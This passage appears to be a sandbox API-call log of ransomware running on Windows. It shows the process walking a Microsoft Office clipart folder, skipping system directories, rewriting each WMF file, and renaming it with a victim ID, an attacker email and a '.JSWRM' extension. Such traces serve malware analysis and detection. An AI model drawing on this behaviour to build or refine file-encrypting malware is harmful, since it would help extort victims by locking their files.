CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0093.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0093.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0093.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02267_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02267_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0093.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.126] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f26, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02270_.WMF", cAlternateFileName="")) returned 1 [0093.126] lstrcmpiW (lpString1="PE02270_.WMF", lpString2=".") returned 1 [0093.126] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="..") returned 1 [0093.126] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="...") returned 1 [0093.126] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="windows") returned -1 [0093.169] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="recovery") returned -1 [0093.170] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="perflogs") returned -1 [0093.170] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="documents and settings") returned 1 [0093.170] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.170] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="system volume information") returned -1 [0093.170] lstrcmpiW (lpString1="PE02270_.WMF", lpString2="msocache") returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02270_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02270_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.173] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28454) returned 1 [0093.174] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6f20) returned 0x24d210 [0093.174] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6f20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6f20, lpOverlapped=0x0) returned 1 [0093.177] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.177] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6f20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6f20, lpOverlapped=0x0) returned 1 [0093.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.178] CloseHandle (hObject=0x314) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0093.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0093.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0093.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0093.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0093.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.180] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb9c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02278_.WMF", cAlternateFileName="")) returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2=".") returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="..") returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="...") returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="windows") returned -1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="recovery") returned -1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="perflogs") returned -1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="documents and settings") returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="system volume information") returned -1 [0093.180] lstrcmpiW (lpString1="PE02278_.WMF", lpString2="msocache") returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0093.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02278_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02278_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02278_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0093.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02278_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02278_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02278_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.182] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47556) returned 1 [0093.182] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb9c0) returned 0x24d210 [0093.183] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb9c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb9c0, lpOverlapped=0x0) returned 1 [0093.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.192] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb9c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb9c0, lpOverlapped=0x0) returned 1 [0093.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.193] CloseHandle (hObject=0x314) returned 1 [0093.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0093.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0093.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0093.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0093.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0093.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6928, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02280_.WMF", cAlternateFileName="")) returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2=".") returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="..") returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="...") returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="windows") returned -1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="recovery") returned -1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="perflogs") returned -1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="documents and settings") returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="system volume information") returned -1 [0093.195] lstrcmpiW (lpString1="PE02280_.WMF", lpString2="msocache") returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02280_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02280_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02280_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02280_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02280_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02280_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26920) returned 1 [0093.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6920) returned 0x24d210 [0093.197] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6920, lpOverlapped=0x0) returned 1 [0093.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.201] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6920, lpOverlapped=0x0) returned 1 [0093.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.201] CloseHandle (hObject=0x314) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0093.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0093.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0093.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.202] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02282_.WMF", cAlternateFileName="")) returned 1 [0093.202] lstrcmpiW (lpString1="PE02282_.WMF", 